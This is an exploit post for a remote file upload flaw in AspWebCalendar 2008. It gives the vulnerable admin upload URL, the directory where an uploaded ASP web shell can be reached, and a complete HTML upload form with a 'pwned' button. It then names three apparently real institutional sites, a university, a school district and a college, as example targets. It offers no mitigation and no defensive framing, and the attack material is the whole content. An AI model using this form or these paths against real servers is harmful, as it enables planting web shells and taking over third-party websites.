Title:AspWebCalendar 2008 Remote File Upload Vulnerability
http://[site.com]/path/calendar_admin.asp?action=uploadfile ==>>> upload your Asp
shell
http://[site.com]/path/calendar/eventimages/yourshell.asp ==>>> your address
upload form
<FORM ENCTYPE='multipart/form-data' METHOD='post'
ACTION='http://HOST/PATH//calendar_admin.asp?action=uploadfileprocess&form=&element='><FONT
<FONT COLOR='blue'
>http://example.com/path/calendar/eventimages/</FONT></FONT><BR><INPUT TYPE=FILE
SIZE=56 NAME='FILE1'><BR><BR><INPUT TYPE='submit' VALUE='pwned'></FORM></P>
ex1:http://bugs.mimnet.northwestern.edu/ConfRoomCal//calendar_admin.asp?action=uploadfile
ex2:http://calendar.newpal.k12.in.us//calendar_admin.asp?action=uploadfile
ex3:http://macomb.cc.mi.us/calendar//calendar_admin.asp?action=uploadfile
Sp thnx:Cr@zy_King Kerem125 Jextoxic Abo Mohammed